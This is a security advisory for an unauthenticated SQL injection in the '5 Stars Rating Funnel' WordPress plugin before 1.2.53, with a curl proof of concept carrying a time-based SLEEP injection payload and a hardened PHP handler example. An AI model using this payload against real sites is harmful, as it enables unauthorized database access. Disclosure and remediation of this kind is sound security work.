5 Stars Rating Funnel < 1.2.53 - Unauthenticated SQLi

Description

The plugin does not properly sanitise, validate and escape lead ids before using them in a SQL statement via the rrtngg_delete_leads AJAX action, which is available to unauthenticated users, leading to an unauthenticated SQL injection issue. There is an attempt to sanitise the input using sanitize_text_field(), but that function strips tags and control characters only and is not intended to prevent SQL injection.

Proof of Concept

Create a new funnel (All Rating Funnels sub-menu)
Create a new lead (Leads / Feedbacks sub-menu)
Invoke the following curl command to trigger a 5-second sleep

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rrtngg_delete_leads&lead_ids[]=(SELECT SLEEP(5))) AND 1=1 #'
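For the defensive side of the description above, an added illustrative handler (not the plugin's own code; the hook name, nonce action and table name are assumptions) showing the three layers the advisory says are missing: authorisation, integer validation of the ids, and parameterised SQL.

```php
<?php
// Hypothetical hardened "delete leads" AJAX handler (not the plugin's code).
// Hook name, nonce action and table name are placeholders.
//
// Weak pattern the advisory describes: sanitize_text_field() strips tags and
// control characters but leaves quotes, parentheses and SQL keywords intact,
// so concatenating its output into the IN (...) list is still injectable:
//   $ids = array_map( 'sanitize_text_field', (array) $_POST['lead_ids'] );
//   $wpdb->query( "DELETE FROM {$table} WHERE id IN (" . implode( ',', $ids ) . ')' );

add_action( 'wp_ajax_example_delete_leads', 'example_delete_leads' );
// Deliberately no wp_ajax_nopriv_ registration: unauthenticated users never reach this.

function example_delete_leads() {
    global $wpdb;

    // 1. Authorisation: a nonce tied to this action plus a capability check.
    check_ajax_referer( 'example_delete_leads', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. Validation: ids must be positive integers. absint() turns a payload such as
    //    "(SELECT SLEEP(5))) AND 1=1 #" into 0, which array_filter() then discards.
    $ids = array_filter( array_map( 'absint', (array) ( $_POST['lead_ids'] ?? array() ) ) );
    if ( empty( $ids ) ) {
        wp_send_json_error( 'no valid lead ids', 400 );
    }

    // 3. Escaping: one %d placeholder per id, bound through $wpdb->prepare().
    $table        = $wpdb->prefix . 'example_leads'; // placeholder table name
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $deleted      = $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table} WHERE id IN ({$placeholders})", array_values( $ids ) )
    );

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
```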

Affects Plugins

Fixed in 1.2.53

Classification

Type
SQLI

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Verified
Yes

Timeline

Publicly Published
2022-03-29
Added
2022-03-29
Last Updated
2022-04-13